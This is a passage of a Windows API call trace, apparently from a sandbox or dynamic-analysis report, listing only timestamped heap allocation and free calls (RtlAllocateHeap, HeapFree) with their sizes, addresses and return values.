RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106270 [0035.609] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1064b0 [0035.609] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105a00 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103f58 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefd18 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef950 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef160 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1e00 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xefb28 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf10b8 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1148 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11d8 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103778 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103808 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103898 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103928 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055e8 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105b20 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1060c0 | out: hHeap=0xe0000) returned 1 [0035.623] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105970 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105730 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1061e0 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106540 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105fa0 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105df0 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106030 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1056a0 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1058e0 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1064b0 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1918 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xe6ed8 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xe6ed8 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf10b8 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x103778 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103d10 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x103888 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf10b8 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0xf10b8 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105850 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105260 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b00 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105260 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x106270 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b00 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x106a80 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106270 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.624] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.624] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.625] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.625] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.626] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103888 | out: hHeap=0xe0000) returned 1 [0035.627] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf10b8 | out: hHeap=0xe0000) returned 1 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103778 | out: hHeap=0xe0000) returned 1 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106a80 | out: hHeap=0xe0000) returned 1 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103d10 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf10b8 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0x103778 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b90 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x103888 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf10b8 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0xf10b8 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106150 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x1054f0 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103ce0 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1054f0 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0x105f10 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103ce0 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x106a80 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105f10 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.628] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.628] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.629] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.629] 